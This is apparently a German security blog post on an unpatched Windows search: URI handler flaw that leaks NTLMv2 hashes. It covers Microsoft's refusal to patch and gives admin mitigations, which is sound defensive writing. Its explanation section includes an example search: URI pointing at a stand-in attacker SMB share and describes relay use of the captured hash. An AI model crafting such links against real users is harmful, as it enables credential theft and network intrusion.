Eine ungepatchte Schwachstelle im Windows-Such-Handler macht es Angreifern möglich, den NTLMv2-Hash eines Nutzers abzufangen — mit einem einzigen Klick auf einen präparierten Link, bevor Windows überhaupt eine Fehlermeldung zeigt. Sicherheitsforscher von Huntress haben die Lücke am 15. April 2026 verantwortungsvoll gemeldet. Microsoft hat entschieden, sie nicht zu schließen.
Wie die Lücke funktioniert
Der Windows-Such-Handler (search:) erlaubt es, per URI-Parameter einen Netzwerkpfad mitzugeben — zum Beispiel: search:query=test&crumb=location:\\angreifer-server\share. Klickt ein Nutzer auf einen solchen Link in einer E-Mail oder auf einer präparierten Webseite, baut Windows automatisch eine Verbindung zu dem angegebenen Pfad auf. Dabei wird NTLM-Authentifizierung ausgelöst — und der Net-NTLMv2-Hash des Nutzers landet auf dem Server des Angreifers, ohne dass ein Passwort eingegeben wurde.
Den Hash können Angreifer direkt für Relay-Angriffe nutzen: ihn gegen interne Dienste spielen, die noch NTLM akzeptieren, und sich so Netzwerkzugang verschaffen — das eigentliche Passwort bleibt dabei unbekannt. Der Mechanismus ist nicht neu; ähnliche NTLM-Leaks über Windows-URI-Handler wurden bereits 2024 für andere Komponenten wie Outlook dokumentiert (CVE-2023-35636).
„Moderate“ — und was das wirklich bedeutet
Das klingt nach einem klaren Patch-Fall — für Microsoft aber nicht. Der Konzern hat die Lücke als „Moderate“ eingestuft und nach eigener Servicingrichtlinie erklärt, nur „Important“- und „Critical“-Schwachstellen aktiv zu beheben. Keine CVE-Nummer, kein Patch, kein Zeitplan.
Das Problem liegt in der Diskrepanz zwischen formaler Einstufung und realem Risiko. In einem typischen Active-Directory-Umfeld ist ein abgefangener Net-NTLMv2-Hash praktisch ein temporärer Netzwerkzugang — „Moderate“ beschreibt das schlecht. Die Lücke ist mechanisch identisch mit CVE-2026-33829 im Snipping Tool, die Microsoft ebenfalls nicht als Pflicht-Patchfall eingestuft hat. Dass dasselbe Muster nun zum zweiten Mal ohne Fix bleibt, wirft Fragen zur systematischen Behandlung solcher URI-Handler-Schwachstellen auf.
Was Admins jetzt tun können
Solange kein Patch existiert, helfen nur Compensating Controls:
- Outbound SMB blockieren (TCP 445 und 139) auf Hosts ohne Netzwerkfreigaben-Bedarf — verhindert, dass der präparierte Link den Hash überhaupt zum Angreifer überträgt.
- SMB Signing erzwingen — damit wird ein abgefangener Hash für Relay-Angriffe unbrauchbar, weil jede Nachricht kryptografisch signiert werden muss.
- NTLM deaktivieren, wo der Bestand es erlaubt; Kerberos reicht in modernen Domänen für die meisten Dienste aus.
Bei den meisten KMU-Kunden, die ich betreue, ist das vollständige Abschalten von NTLM kein realistischer Schritt für nächste Woche — zu viel Altbestand mit Scanner-Einbindungen und älterer Software, die explizit NTLM voraussetzt. Outbound-SMB zu blockieren und SMB Signing durchzusetzen sind die schnelleren Hebel, die ohne umfangreiche Ausfalltests greifen.
Ob Microsoft die Einstufung irgendwann überdenkt, bleibt offen. Die Konsequenzen des ungepatchten Zustands tragen bis dahin die Admins, die die betroffenen Umgebungen betreiben.
